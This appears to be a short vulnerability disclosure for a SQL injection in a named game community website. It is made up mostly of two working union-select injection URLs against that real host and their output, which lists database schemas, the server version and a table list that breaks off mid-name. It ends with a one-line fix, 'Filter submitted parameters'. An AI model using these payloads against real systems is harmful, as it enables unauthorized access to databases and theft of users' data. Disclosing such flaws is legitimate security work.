All databases
Proof of vulnerability: http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 union select 1, 2, 4, database (), 6, 7, group_concat (schema_name), 9, 10, 11, @ version, 13 from information_schema.schemata
Tables in the current database
Http://club.kok3.ztgame.com/index.php/Index/showGong/id/-516 union select 1, 2, 4, database (), 6, 7, group_concat (table_name), 9, 10, 11, @ version, 13 from information_schema.tables where table_schema = database ()
Think_album,
Think_album_qun,
Think_app,
Think_attach,
Think_blog,
Think_boss,
Think_chat,
Think_code,
Think_comment,
Think_doing,
Think_email,
Think_file_group,
Think_game,
Think_gift,
Think_gift_category,
Think_gong,
Think_gong_ding,
Think_group,
Think_group_member,
Think_hello,
Think_image,
Think_jiazu,
Think_koc,
Think_love,
Think_magic,
Think_material,
Think_m
Solution: Filter submitted parameters